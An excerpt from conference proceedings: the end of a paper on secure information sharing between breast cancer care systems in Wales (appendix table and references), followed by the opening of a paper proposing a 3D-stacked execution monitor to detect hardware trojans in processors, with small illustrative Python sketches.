to, a clinical assessment and patient history check. Time and resources could be saved if this information<br />
were available to the healthcare professional in charge at the point of treatment. In addition, data<br />
redundancy can cause data inconsistency issues and having a single shared data record (i.e. patient<br />
history) guarantees the availability of up-to-date information for all MDT members. Another example is<br />
that GPs should support patients undergoing diagnosis, treatment and follow-up leading either to cure<br />
or to eventual death. This means GPs should follow patients from the very start of the ICP. Although<br />
patients may start their ICP at different stages, the GP should have direct contact with other breast<br />
cancer MDT members treating the patient in order to be informed about all of the patient’s current<br />
relevant medical information at all times. This would enable effective consultation and follow-up. In<br />
addition, there can be different professionals playing the same role and also one professional playing<br />
different roles. Furthermore, privacy violations can be expected if all of the members can see every<br />
patient’s records (Anderson, 2008). This emphasises the need for an effective SCE with systems that<br />
can ensure the availability of life-critical information about the patient’s medical condition based on the<br />
professional’s role at the time of treatment. Also, the breast cancer MDT checks 100 patients<br />
annually. Each of these patients will be following different directions in the same ICP, and in some<br />
cases, following multiple ICPs as well, if the patient suffers from more than one disease. This will be<br />
difficult to manage without the support of an HIS that considers the patient’s condition as a whole.<br />
Therefore, good inter-professional communication is essential to co-ordinate the activities of all those<br />
involved, and ensure effective communication between professionals working in the primary,<br />
secondary and tertiary sectors of care. For that reason, the breast care MDT must develop and<br />
implement systems that ensure rapid and effective communication between all healthcare<br />
professionals involved in each patient’s treatment management. This would facilitate the provision of<br />
adequate means for communicating information on referral, diagnosis and treatment, follow-up, and<br />
supportive/palliative care throughout the stages of the ICP.<br />
The HISs identified in this research can be studied to identify the IS issues in these systems that<br />
hinder inter-professional communication. This can be achieved by investigating the IS rules applied in<br />
these HISs to protect medical information. This is an important step to take before speaking to all<br />
involved parties to learn the IS needs that would facilitate the SCE with others involved in the<br />
treatment. This can help identify and define the best way to have persistent control over the<br />
information accessed in a distributed environment when it will be moved outside the HIS’s locally<br />
controlled environment. This can be achieved either by agreeing on a set of common rules for all<br />
involved HISs to apply in a neutral administrative domain used for the sharing process, or by<br />
changing the way they work internally by standardising the IS rules. It may be that sharing in either of<br />
these ways is not possible at this point in time. The main aim of this research at the moment is to<br />
facilitate an SCE that can support collaboration among MDT members while guaranteeing persistent<br />
control over shared patient medical information in the future. This would be hard to achieve without<br />
the identification of the IS issues and emerging needs in this dynamic environment through the study<br />
of a real-life scenario.<br />
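The notion of persistent control discussed above, where the owner’s IS rules travel with the shared item and are re-evaluated wherever it is accessed, even outside the owning HIS’s locally controlled environment, can be illustrated with a minimal sketch. The class and names below are hypothetical and are not the paper’s implementation.

```python
# Hedged sketch of "persistent control": the owning organisation's IS
# rules are embedded with the shared item, and enforced at every access,
# even outside the owner's locally controlled environment.
class ProtectedItem:
    def __init__(self, owner, payload, allowed_roles):
        self.owner = owner                    # organisation that set the rules
        self._payload = payload               # the shared medical information
        self.allowed_roles = set(allowed_roles)

    def access(self, requester_role):
        """Release the payload only if the owner's embedded rule permits it."""
        if requester_role in self.allowed_roles:
            return self._payload
        raise PermissionError(
            f"{requester_role} is not permitted by {self.owner}'s rules")
```

Because the rule set is part of the object itself, any receiving system that honours the wrapper enforces the same owner-defined policy, which is the essence of the persistent control this research seeks.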
6. Conclusion<br />
There is a shift today towards collaboration among different healthcare organisations, with the<br />
common goal of better patient treatment through a move to patient-centric care. In achieving this, IS<br />
is essential to the effectiveness and dynamism of collaborative working if its full potential is<br />
to be realised. The provision of an SCE for multiple organisations has proved to be a challenge. This<br />
paper presents the results of a study into the inter-professional communication needs of a secure<br />
cross-organisational information-sharing system in the healthcare domain. The findings in this paper<br />
provide the initial results from the first stage of the project and they will be used to inform further<br />
investigation in the ensuing stages to identify the key IS issues affecting inter-professional<br />
communication, as well as the IS needs in this environment which facilitate the sharing of information<br />
throughout the distributed domain.<br />
7. Appendix A<br />
The following table contains redundancy, as some information types appear in more than one<br />
record type. This is indicated by a bracketed list of numbers, where each number refers to the other<br />
HIS record types containing the same information. This redundancy has two causes: either the<br />
information is copied from another record into this system, in which case the original should be the<br />
accurate version, or separate readings were taken and the results stored in these<br />
different systems. All records hold administrative/demographic data for each patient, so Table 1 only<br />
lists non-administrative information.<br />
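The cross-system redundancy that the bracketed notation records can be computed mechanically. The sketch below uses a small hypothetical excerpt, not the full contents of Table 1.

```python
# Sketch of the redundancy Appendix A records: the same information type
# stored in more than one HIS. The data here is a hypothetical excerpt.
HIS_CONTENTS = {
    1: {"clinical history report", "referral form", "follow-up plan"},
    2: {"clinical history report", "referral form", "blood test results"},
    3: {"blood test results", "FBC report"},
}

def redundant_info(contents=HIS_CONTENTS):
    """Map each information type to the set of HISs holding it,
    keeping only types stored in more than one system."""
    seen = {}
    for his, items in contents.items():
        for item in items:
            seen.setdefault(item, set()).add(his)
    return {item: systems for item, systems in seen.items()
            if len(systems) > 1}
```

Each entry of the result corresponds to one bracketed annotation in Table 1: the information type together with the set of systems that duplicate it.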
Table 1: HISs used in treating patients with breast cancer in Wales, UK<br />
1. GP-System. Health record type: GP-records. Information stored: clinical presentation report; clinical assessment report; clinical history report [2]; physical examination report [2]; filled referral form (patient details, referring doctor details, medical context, and referral information) [2]; information about referred patients’ diagnosis (by the end of the Triple Assessment pathway) [2]; MDT recommendations and treatment plans [2,6,7]; given treatment plan [2]; given medication [2]; follow-up plan [2]; follow-up visits report [2].<br />
2. Secondary-Care-System. Health record type: secondary-care-records. Information stored: referral form [1]; clinical history report [1]; clinical examination code [1]; test requests (e.g. blood, ultrasound, X-ray) [3,4]; blood test results report [3]; X-ray and ultrasound results report [4]; pathologists’ reports [5]; radiologists’ and oncologists’ results reports [6]; surgeons’ reports [7]; general patient case notes (breast cancer diagnosis, staging, pathology information, histology reports, and test result reports) [1,3,4,5,6,7]; general information addressing the patient’s specific situation (leaflets, audio or video CDs); MDT recommendations and treatment plans [1,6,7]; given treatment plan; follow-up plan; follow-up visits report.<br />
3. Hematology-Laboratory-System. Health record types: whole blood samples (for FBC); blood for grouping, antibody screening and saving and/or cross-matching; request forms for grouping, antibody screening and cross-matching; results of grouping, antibody screening and cross-matching; lab file cards/working records of test results. Information stored: test requests [2]; general patient case notes [1,2,4,5,6,7]; blood test results report; FBC report; renal and liver function test report; blood calcium test report.<br />
4. X-ray-System. Health record types: X-ray films records; X-ray reports (including reports for all imaging modalities); breast screening X-ray records; ultrasound records. Information stored: test requests [2]; general patient case notes [1,2,3,5,6,7]; mammography report; X-ray images; ultrasound report; ultrasound images; MRI report; MRI images; isotope bone scan; CT report and CXR image; abdomen ultrasound image; echocardiogram scan report and scan image; DEXA scanning report and image.<br />
5. Pathology-Laboratory-System. Health record types: pathology records; human tissue; lab file cards/working records of test results. Information stored: administrative information/demographic data [1,2,3,4,6,7]; test requests from oncologist [6]; general patient case notes [1,2,3,4,6,7]; biopsy report with diagnosing code; FNA report with diagnosing code; tissue samples; the cancer tumour size, nodes, metastasis (TNM) staging code; tumour grade; histology report with biopsy diagnosing code.<br />
6. Oncology-System. Health record types: oncology records; radiation dose records for classified persons. Information stored: test requests [2]; general patient case notes [1,2,3,4,5,7]; MDT recommendations and treatment plan [1,2,7]; test requests to pathologist; cancer TNM staging code [5]; tumour grade [5]; neo-adjuvant endocrine therapy report; neo-adjuvant chemotherapy report; chemotherapy drugs list and dose; radiotherapy report; adjuvant chemotherapy report (including the risk analysis); hormonal therapy report; endocrine therapy report; bisphosphonates report.<br />
7. Surgical-System. Health record types: operating theatre registers; surgical records. Information stored: surgical report; general patient case notes [1,2,3,4,5,6]; MDT recommendations and treatment plans [1,2,6].<br />
References<br />
Al-Salamah, H., Gray, A., Allam, O. and Morrey, D., (2009). Change Management along the Integrated Care<br />
Pathway. In: the 14th International Symposium on Health Information Management Research. Bath P,<br />
Petersson G, and Steinschaden T, editors. Kalmar, Sweden. pp. 53-66.<br />
Alfieri, R. et al., (2003). VOMS, an Authorization System for Virtual Organizations. In: the 1st <strong>European</strong> Across<br />
Grids <strong>Conference</strong>. Santiago de Compostela. pp. 33-40.<br />
Allam, O., (2006). A Holistic Analysis Approach to Facilitating Communication between General Practitioners and<br />
Cancer Care Teams. Thesis. Department of Computer Science & Informatics. Cardiff University. Cardiff. pp.<br />
182.<br />
Anderson, R. J., (2008). Security Engineering 2nd ed. Indianapolis: Wiley Publishing.<br />
285
Shada Alsalamah et al.<br />
Aylin, P., Tanna, S., Bottle, A. and Jarman, B., (2004). How often are adverse events reported in English hospital<br />
statistics? BMJ, 329, (7462) 369.<br />
Beale, T., (2004). The Health Record - Why is it so hard? IMIA Yearbook of Medical Informatics 2005. Ubiquitous<br />
Health Care Systems. Haux R, Kulikowski C, editors. Stuttgart: Schattauer. pp. 301-304.<br />
Burnap, P. and J. Hilton., (2009). Self Protecting Data for De-perimeterised Information Sharing. In: The Third<br />
International <strong>Conference</strong> on Digital Society, ICDS '09. Cancun, Mexico. pp. 65-70.<br />
Blackhurst, D., (2010). GPs fear breach of secret patient data, [online]. Available from:<br />
http://www.thisisstaffordshire.co.uk/news/GPs-fear-breach-secret-patient-data/article-772149detail/article.html<br />
[Accessed: 02 November 2010].<br />
Cancer Services Expert Group, (2008). Breast Cancer Task Group Report, The Cameron report, Cardiff: NHS<br />
Wales.<br />
Chadwick, D. W. and Otenko, A., (2002). The PERMIS X.509 role based privilege management infrastructure. In:<br />
Proceedings of the seventh ACM symposium on Access control models and technologies. Monterey,<br />
California, USA: ACM.<br />
Commission for Health Improvement and Audit Commission (CHIAC), (2001). National Service Framework<br />
Assessments No. 1: NHS Cancer Care in England and Wales. London: Commission for Health<br />
Improvement.<br />
Cross, M., (2010). Patients, not the state, own medical records, says GP, [online]. Guardian online. Available<br />
from: http://www.guardian.co.uk/technology/2006/jul/06/epublic.guardianweeklytechnologysection<br />
[Accessed: 01 March 2010].<br />
Department of Health, (1997). The new NHS: modern, dependable. London: HMSO.<br />
Department of Health, (2000). An organisation with a memory. London: HMSO.<br />
Department of Health, (2003). Confidentiality: NHS Code of Practice. London: HMSO.<br />
Department of Health, (2006). Records management: NHS code of practice. London: HMSO.<br />
Mandl, K. D. et al., (2001). Public standards and patients' control: how to keep electronic medical records<br />
accessible but private Commentary: Open approaches to electronic patient records Commentary: A<br />
patient's viewpoint. BMJ, 322, (7281) pp. 283-287.<br />
Map of Medicine, (2010a). Breast cancer - advanced, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer6.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010b). Breast cancer - local recurrence, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer5.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010c). Breast Cancer- suspected, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer1.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010d). Initial multidisciplinary team (MDT) review, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer3.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010e). Map of Medicine, [online]. Available from: http://mapofmedicine.com/ [Accessed: 12<br />
January 2010].<br />
Map of Medicine, (2010f). Map of Medicine Healthguides, [online]. Available from:<br />
http://www.mapofmedicine.com/solution/patientaccess/ [Accessed: 12 January 2010].<br />
Map of Medicine, (2010g). Postsurgical multidisciplinary team (MDT) review, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer4.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010h). Secondary care - triple assessment clinic, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer2.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010i). See what your doctor can see with Map of Medicine Healthguides, [online]. Available<br />
from: http://healthguides.mapofmedicine.com/choices/map/index.html [Accessed: 12 January 2010].<br />
Meystre, S., (2007). Electronic Patient Records: Some Answers to the Data Representation and Reuse<br />
Challenges. IMIA Yearbook 2007: Biomedical Informatics for Sustainable Health Systems, (1) 47- 48.<br />
Mohyuddin, Gray, W. A. et al., (2008). Wireless Patient Information Provision and Sharing at the Point of Care<br />
using a Virtual Organization Framework in Clinical Work. In: sixth Annual IEEE International <strong>Conference</strong> on<br />
Pervasive Computing and Communications. IEEE Computer Society. pp. 710 - 714.<br />
Nene, B. and Swanson, T., (2009). Information Rights Management Application Patterns, report: Microsoft<br />
Corporation.<br />
National Institute for Healthcare and Clinical Excellence (NICE), (2002). Improving Outcomes in Breast Cancer -<br />
Manual Update, report, London.<br />
Nursingtimes, (2010a). Data protection warning as more trusts lose patient records, [online]. Available from:<br />
http://www.nursingtimes.net/whats-new-in-nursing/acute-care/data-protection-warning-as-more-trusts-losepatient-records/5004097.article<br />
[Accessed: 01 June 2010].<br />
Nursingtimes, (2010b). Loss of patient details prompts warning for five trusts, [online]. Available from:<br />
http://www.nursingtimes.net/whats-new-in-nursing/acute-care/loss-of-patient-details-prompts-warning-forfive-trusts/5004422.article<br />
[Accessed: 01 June 2010].<br />
Office of Public Sector Information, (2010). Access to Medical Reports Act 1988 (1988 CHAPTER 28), [online].<br />
Available from: http://www.opsi.gov.uk/acts/acts1988/Ukpga_19880028_en_1.htm [Accessed: 01 June<br />
2010].<br />
Park, J. and Sandhu, R., (2002). Towards usage control models: beyond traditional access control. In: the<br />
seventh ACM symposium on Access control models and technologies, SACMAT '02. Monterey, California,<br />
USA: ACM. pp. 57-64.<br />
Pirnejad, H., (2008). Communication in Healthcare: Opportunities for information technology and concerns for<br />
patient safety. Thesis. Erasmus University. Rotterdam. pp. 164.<br />
Røstad, L. and Alsos, O. A., (2009). Patient-Administered Access Control: A Usability Study. In: International<br />
<strong>Conference</strong> on Availability, Reliability and Security 2009. ARES '09. IEEE Computer Society. pp. 877- 881.<br />
Skilton, A. et al., (2009). Role Based Access in a Unified Electronic Patient Record. In: The 14th International<br />
Symposium on Health Information Management Research. Bath P, Petersson G, and Steinschaden T,<br />
editors. Kalmar, Sweden. pp. 217-222.<br />
Smith, E. and Eloff, J. H. P., (1999). Security in Health-care information systems - current trends. International<br />
Journal of Medical Informatics, 54, (1) pp. 39-54.<br />
Sturcke, J. and Campbell, D., (2010). NHS database raises privacy fears, say doctors, [online]. Available from:<br />
http://www.guardian.co.uk/society/2010/mar/07/nhs-database-doctors-warning?CMP=twt_gu [Accessed: 12<br />
November 2010].<br />
Thompson, M. R., Essiari, A. and Mudumbai, S., (2003). Certificate-based authorization policy in a PKI<br />
environment. ACM Trans. Inf. Syst. Secur., 6, (4) pp. 566-588.<br />
Wasson, G. and Humphrey, M., (2003). Policy and Enforcement in Virtual Organizations. In: The fourth<br />
International Workshop on Grid Computing, IEEE/ACM IEEE Computer Society. pp.125.<br />
Yau, S. S. and Chen, Z., (2008). Security Policy Integration and Conflict Reconciliation for Collaborations among<br />
Organizations in Ubiquitous Computing Environments. In: Ubiquitous Intelligence and Computing, UIC.<br />
Springer Berlin/ Heidelberg. pp. 3- 19.<br />
Zander, K., (2002). Integrated Care Pathway: eleven international trends. Journal of Integrated Care Pathways,<br />
6, pp. 101-107.<br />
3D Execution Monitor (3D-EM): Using 3D Circuits to Detect<br />
Hardware Malicious Inclusions in General Purpose<br />
Processors<br />
Michael Bilzor<br />
U.S. Naval Postgraduate School, Monterey, California, USA<br />
mbilzor@nps.edu<br />
Abstract: Hardware malicious inclusions (MIs), or "hardware trojans," are malicious artifacts planted in<br />
microprocessors. They present an increasing threat to computer systems due to vulnerabilities at several stages<br />
in the processor manufacturing and acquisition chain. Existing testing techniques, such as side-channel analysis<br />
and test-pattern generation, are limited in their ability to detect malicious inclusions. These hardware attacks can<br />
allow an adversary to gain total control over a system, and are therefore of particular concern to high-assurance<br />
customers like the U.S. Department of Defense. In this paper, we describe how three-dimensional (3D) multilayer<br />
processor fabrication techniques can be used to enhance the security of a target processor by providing<br />
secure off-chip services, monitoring the execution of the target processor's instruction set, and disabling<br />
potentially subverted control circuits in the target processor. We propose a novel method by which some<br />
malicious inclusions, including those not detectable by existing means, may be detected and potentially mitigated<br />
in the lab and in fielded, real-time operation. Specifically, a target general-purpose processor, in one layer, is<br />
joined using 3D interconnects to a separate layer, which contains an Execution monitor for detecting deviations<br />
from the target processor's specified behavior. The Execution monitor layer is designed and fabricated separately<br />
from the target processor, using a trusted process, whereas the target processor may be fabricated by an<br />
untrusted source. For high-assurance applications, the monitor layer may be joined to the target layer, after each<br />
has been separately fabricated. In the context of existing computer security theory, we discuss the limits of what<br />
an Execution monitor can do, and describe how one might be constructed for a processor. Specifically, we<br />
propose that the signals which carry out the target processor's instruction set actions may be described in a<br />
stateful representation, which serves as the input for a finite automata-based Execution monitor, whose<br />
acceptance predicate indicates when the target processor's behavior violates its specification. We postulate a<br />
connection between Execution monitor theory and the proposed 3D processor monitoring system, which can be<br />
used to detect a specific class of malicious inclusions. Finally, we present the results of our first monitor<br />
experiment, in which we designed and tested (in simulation) a simple Execution monitor for a small open-source<br />
32-bit processor design known as the ZPU. We analyzed the ZPU processor to determine which signals must be<br />
monitored, designed a system of monitor interconnects in the hardware description language (HDL)<br />
representation, developed a stateful representation of the microarchitectural behavior of the ZPU, and designed<br />
an Execution monitor for it. We demonstrated that the Execution monitor identifies correct operation of the<br />
original, unmodified ZPU, as it executed arbitrary code. Having introduced some minor deviations to the ZPU<br />
processor's microarchitectural design, we then showed in simulation that the Execution monitor correctly<br />
detected the deviations, in the same way that it might detect the presence of some malicious inclusions in a<br />
modern processor.<br />
Keywords: processor, security, trojan, subversion, detection<br />
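The finite-automaton monitoring idea the abstract describes can be illustrated with a toy sketch. The three-state fetch/decode/execute machine below is purely hypothetical and far simpler than the ZPU's actual microarchitecture; it only shows the shape of the technique: legal transitions are derived from the specification, and any observed transition outside that set is flagged as a deviation.

```python
# Toy sketch of an Execution monitor as a finite automaton. Observed
# processor signals form the input sequence; the specification defines
# the legal (state, signal) -> next-state transitions. The states and
# signals here are hypothetical, not the ZPU's real microarchitecture.
SPEC = {
    ("fetch", "decode"): "decode",
    ("decode", "execute"): "execute",
    ("execute", "fetch"): "fetch",
}

def monitor(signal_trace, start="fetch", spec=SPEC):
    """Return True if the whole trace follows the specification;
    False as soon as a deviation (a possible malicious inclusion,
    or any other specification violation) is observed."""
    state = start
    for signal in signal_trace:
        key = (state, signal)
        if key not in spec:
            return False          # behaviour violates the specification
        state = spec[key]
    return True
```

In the paper's terms, the acceptance predicate of the automaton indicates when the target processor's behaviour violates its specification; a hardware monitor would evaluate the same kind of transition relation over signals tapped through the 3D interconnects.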
1. The threat to microprocessors<br />
Today's Defense Department relies on advanced microprocessors for its high-assurance needs.<br />
Those applications include everything from advanced weaponry, fighter jets, ships, and tanks, to<br />
satellites and desktop computers for classified systems. Much attention and resources have been<br />
devoted to securing the software that runs these devices and the networks on which they<br />
communicate. However, two significant trends make it increasingly important that we also focus on<br />
securing the underlying hardware that runs these high-assurance devices. The first is the U.S.'<br />
greater reliance on processors produced overseas. The second is the increasing ease with which<br />
hardware may be maliciously modified and introduced into the supply chain.<br />
Every year, more microprocessors destined for U.S. Department of Defense (DoD) systems are<br />
manufactured overseas, and fewer are made inside the U.S. As a result, there is a greater risk of<br />
processors being manufactured with malicious inclusions (MIs), which could compromise high-assurance<br />
systems. This concern was highlighted in a 2005 report by the Defense Science Board,<br />
which noted a continued exodus of high-technology fabrication facilities from the U.S. (Defense<br />
Science Board 2005). Since this report, "more U.S. companies have shifted production overseas,<br />
have sold or licensed high-end capabilities to foreign entities, or have exited the business."<br />
(McCormack 2008) One of the Defense Science Board report's key findings reads, "There is no longer<br />
a diverse base of U.S. integrated circuit fabricators capable of meeting trusted and classified chip<br />
needs." (Defense Science Board 2005)<br />
Today, most semiconductor design still occurs in the U.S., but some design centers have recently<br />
developed in Taiwan and China (Yinung 2009). In addition, major U.S. corporations are moving more<br />
of their front-line fabrication operations overseas for economic reasons:<br />
"Press reports indicate that Intel received up to $1 billion in incentives from the Chinese<br />
government to build its new front-end fab in Dalian, which is scheduled to begin production in<br />
2010." (Nystedt 2007)<br />
"Cisco Systems has pronounced that it is a 'Chinese company,' and that virtually all of its products<br />
are produced under contract in factories overseas." (McCormack 2008)<br />
"Raising even greater alarm in the defense electronics community was the announcement by IBM<br />
to transfer its 45-nanometer bulk process integrated circuit technology to Semiconductor<br />
Manufacturing International Corp., which is headquartered in Shanghai, China. There is a concern<br />
within the defense community that it is IBM's first step to becoming a 'fab-less' semiconductor<br />
company." (McCormack 2008)<br />
Since modern processors are designed in software, the processor design plans become a potential<br />
target of attack. Malicious logic can also be inserted after a chip has been manufactured, such as with<br />
focused ion beam milling (Adee 2008).<br />
Though reports of actual malicious inclusions are often classified or kept quiet for other reasons,<br />
some reports do surface, like this unverified account (Adee 2008):<br />
According to a U.S. defense contractor who spoke on condition of anonymity, a<br />
'European chip maker' recently built into its microprocessors a "kill switch" that could be<br />
accessed remotely. French defense contractors have used the chips in military<br />
equipment, the contractor told IEEE Spectrum. If in the future the equipment fell into<br />
hostile hands, 'the French wanted a way to disable that circuit,' he said.<br />
According to the New York Times, such a "kill switch" may have been used during the 2007 Israeli<br />
raid on a suspected Syrian nuclear facility under construction (Markoff 2009).<br />
2. Characterizing processor malicious inclusions<br />
Several academic research efforts have demonstrated the insertion of MIs into general-purpose<br />
processor designs. In one example, King, et al., show how a very small change in the design of a<br />
processor facilitates "escalation-of-privilege" and "shadow mode" attacks, each of which can allow an<br />
adversary to gain arbitrary control over the targeted system (King 2009). In another example, Jin, et<br />
al., show how small, hard-to-detect MIs can allow an adversary to gain access to a secret encryption<br />
key (Jin 2009). Researchers have created various taxonomies of MIs, based on their characteristics.<br />
One example comes from Tehranipoor and Koushanfar (Tehranipoor 2010), from which the following<br />
simplified diagram (Figure 1) is derived:<br />
The components of a simple general-purpose processor are generally classifiable according to their<br />
function. For example, a circuit in a microprocessor may participate in control-flow execution<br />
(participate in fetch-decode-execute-retire), be part of a data path (like a bus), execute storage and<br />
retrieval (like a cache controller), assist with control, test and debug (as in a debug circuit), or perform<br />
arithmetic and logic computation (like an arithmetic logic unit, or ALU). This list may not be<br />
exhaustive, and some circuits' functions may overlap, but broadly speaking we can subdivide the<br />
component circuits in a processor using these classifications.<br />
The main focus of our research is the detection of malicious inclusions which target the first category,<br />
control flow circuits. In considering processor malicious inclusions, it is worth noting that in some<br />
cases a detection strategy is warranted, and in others a mitigation strategy may be preferable. Table<br />
1 lists each of the circuit functional types mentioned above, and pairs it with a potential 3D detection<br />
and/or mitigation strategy.<br />
Figure 1: A taxonomy of malicious inclusions, modified slightly from (Tehranipoor 2010)<br />
Table 1: Processor circuit type, with some associated MI mitigation and detection techniques<br />
Circuit Type Detection/Mitigation Technique<br />
Control Flow Control Flow Execution Monitor<br />
(subject of our experiments)<br />
Chip Control, Test, and Debug Keep-Alive Protections<br />
Data Paths Datapath Integrity Verification<br />
Memory Storage and Retrieval Load/Store Verification<br />
Arithmetic and Logic Computation Arithmetic/Logic Verification<br />
In Figure 2, we update the malicious inclusion taxonomy from Figure 1, and associate each MI action<br />
type with a matching detection or mitigation technique:<br />
Figure 2: Malicious inclusion taxonomy, with associated mitigation and detection methods<br />
In our current experiments, we intend to demonstrate an implementation of the execution monitor,<br />
which governs the operation of the instruction set of a general-purpose processor, and should detect<br />
MIs from the fourth action category, "Modify Functionality." MIs from this category might, for example,<br />
be designed to allow an adversary to leak secret information or to gain privileged access to a system.<br />
3. Limits of existing processor tests<br />
General-purpose processor designs go through verification testing before fabrication begins. Design-phase<br />
verification usually involves construction of a verification environment using tools like<br />
SystemVerilog and the Open Verification Methodology (OVM) (Iman 2008). There are several<br />
shortfalls in processor design verification with respect to malicious inclusions:<br />
Not all processor designs, or portions of designs, undergo formal verification. Processor designs<br />
also may incorporate reused sub-components, as well as unverified open-source or third-party<br />
components.<br />
Processor design verification tends to ensure that the processor correctly executes its intended<br />
functions, but usually is not designed to verify the absence of additional, possibly malicious<br />
functionality, such as an MI.<br />
Processor design verification usually cannot be exhaustive, due to the exponential number of<br />
possible internal configurations of a processor. Modern functional verification often focuses on<br />
generating a sufficient number of random test cases to be reasonably confident of a design's<br />
correctness; as a result, rare-event malicious triggers may not be detected.<br />
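The last shortfall can be made concrete with a back-of-the-envelope estimate (the trigger width and test count here are invented for illustration): a trigger that fires on exactly one 64-bit operand value is effectively invisible to random testing.<br />

```python
# Back-of-the-envelope: chance that random functional tests ever activate a
# trigger firing on exactly one 64-bit operand value (numbers are invented).
trigger_space = 2 ** 64
random_tests = 10 ** 9              # a billion random test vectors

# Union bound (and, at these scales, an excellent approximation):
p_hit_at_most = random_tests / trigger_space
print(p_hit_at_most)                # about 5.4e-11: essentially never hit
```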
Once a processor has been fabricated, some sample dies may be examined, destructively or<br />
nondestructively, for the presence of MIs. Using destructive methods, a processor's top layers may be<br />
removed and its metal layers examined for anomalies, using specialized imagers. Since processors<br />
cannot be used operationally after destructive testing, this approach is limited to a small sample set<br />
and is not a complete solution.<br />
Non-destructive processor tests include various power and timing "fingerprinting" techniques.<br />
Essentially, using sensitive measuring equipment, a tester can drive a processor's inputs with test<br />
patterns and measure current and timing delays at the outputs. The results from the device under test<br />
are statistically compared with the results from presumed-good, or "golden," sample processors. The<br />
principal limitations of nondestructive fingerprint-based testing include the following (Agrawal 2007,<br />
Jin 2008, Jin 2009, Rad 2008):<br />
Such tests rely on the existence of a presumed-good "golden" sample. Therefore, if the<br />
subversion occurred in the design phase, and hence was cast into all the fabricated processors,<br />
the subversion will not be detected through these comparisons.<br />
Very small MIs, involving fewer than around 0.1% of the transistors on a die, are generally not<br />
detectable using these techniques, and it is not very difficult for an attacker to design a subversion<br />
which remains below this threshold.<br />
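A hedged sketch of the statistical comparison underlying fingerprint-based testing (all numbers are invented): a die is flagged only when its side-channel measurement deviates from the golden-sample mean by more than the noise band, so an MI perturbing the fingerprint by well under 0.1% simply hides inside that band.<br />

```python
# Toy model of golden-sample fingerprinting; all numbers are invented.
# A device under test is flagged only if its measurement deviates from the
# golden-sample mean by more than k standard deviations of process noise.

def flags_anomaly(measurement, golden_mean, golden_std, k=3.0):
    return abs(measurement - golden_mean) > k * golden_std

GOLDEN_MEAN, GOLDEN_STD = 100.0, 1.0    # e.g., a normalized current trace

# An MI shifting the fingerprint by 0.05% of the mean stays inside the noise
# band, while a gross 10% shift is caught:
small_shift = GOLDEN_MEAN * 1.0005      # escapes detection
gross_shift = GOLDEN_MEAN * 1.10        # flagged
```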
4. 3D fabrication and potential security applications<br />
Because feature sizes are shrinking very near to their theoretical limits, processor manufacturers are<br />
constrained in improving performance through the use of traditional methods on a single-layer design.<br />
As a result, manufacturers and designers have been rapidly advancing the technologies needed to<br />
make "3D" processors. In a 3D processor design, two or more silicon layers are joined together face<br />
to face or face to back, using a variety of interconnection methods. As a result, off-chip resources, like<br />
extra cache memory or another processor, which might normally be elsewhere on the printed circuit<br />
board, are physically much closer to the primary processing layer, resulting in shorter communication<br />
delays, and hence better performance (Mysore 2006). Though the development of 3D interconnect<br />
technology has been driven by performance, several security-relevant applications have also been<br />
suggested (Valamehr 2010):<br />
3D security services, such as those that might be found in a security coprocessor, could be made<br />
available to the primary processor layer.<br />
A 3D layer acting as a "control plane" could monitor and restrict the behavior of a target processor<br />
in the "computation plane." For example, the control plane processor could facilitate the<br />
segregation of multi-level data by partitioning the cache lines inside the target.<br />
Another potential security-relevant application of 3D is the Execution monitor, or 3D-EM. With a 3D-<br />
EM, key control signals of the target processor, or computation plane, are monitored, through 3D<br />
interconnects, by another processor in the control plane. The EM's sole purpose is to monitor the<br />
execution of the target processor, and identify when the sequences of observed signal values deviate<br />
from those sequences allowed by the target processor's design. Design and construction of a 3D-EM<br />
alongside a target processor could occur as follows:<br />
The target processor's architectural design is developed and translated into a hardware description<br />
language (HDL).<br />
From the design documents and HDL specification, the processor's design undergoes normal<br />
functional verification (e.g., formal methods, OVM, simulation, FPGA test), to determine:<br />
Correctness of the expected functionality (as normal).<br />
Absence of any malicious additional functionality (additional steps for MI detection).<br />
Once the target's HDL design is finalized, the target's execution control signals (those which must<br />
be monitored) are identified. An HDL version of the monitor is constructed. One of our research<br />
goals is to develop a "recipe" for these two steps.<br />
During floorplanning (including power, area, and heat optimizations) of the target, the appropriate<br />
3D monitoring interconnects are physically laid out, from the target layer to the monitor layer.<br />
The target's final floorplanned design is transferred to a set of fabrication masks and sent to the<br />
foundry for production. The target processors may be fabricated at either a trusted or an untrusted<br />
foundry.<br />
Target processors which are not destined for high-assurance applications are finished and<br />
assembled onto printed circuit boards.<br />
Target processors which are destined for monitored, high-assurance applications are shipped for<br />
further assembly.<br />
The monitors are fabricated at a trusted facility.<br />
The target processors and monitors are then joined, assembled onto printed circuit boards, and<br />
tested again.<br />
Adding the extra steps to co-design a monitor will slow the overall development process; one goal of<br />
our research is to find ways to automate or semi-automate the monitor co-design portion. The target<br />
processors could still be produced in large volume for non-high-assurance customers, where<br />
monitoring is not required, in order to keep their unit cost down. Only the high-assurance customers<br />
need to go through the extra steps of designing, fabricating, and joining the monitor layer. The monitor<br />
layer might be placed above or below the target layer. One possible arrangement is shown in Figure<br />
3:<br />
Figure 3: A possible 3D arrangement of the monitor and target layers, adapted from (Puttaswamy<br />
2006)<br />
5. Execution monitor theory<br />
Several of the important characteristics of an EM were described by Schneider (Schneider 2000). A<br />
brief summary of some of the conclusions is listed below (see the source for formal definitions of the<br />
safety property and security automata).<br />
The target's execution is characterized by (finite or infinite) sequences, where Ψ denotes a<br />
universe of all possible sequences, and a target S defines a subset ΣS of Ψ corresponding to the<br />
executions of S. The sequences may consist of atomic actions, events, or system states,<br />
for example.<br />
A security policy is specified by giving a predicate on sets of executions. A target S satisfies<br />
security policy P if and only if P(ΣS) equals true.<br />
If the set of executions for a security policy P is not a safety property, then an enforcement<br />
mechanism from an EM does not exist for P.<br />
EM-enforceable security policies are composable: when multiple EMs are used in tandem, the<br />
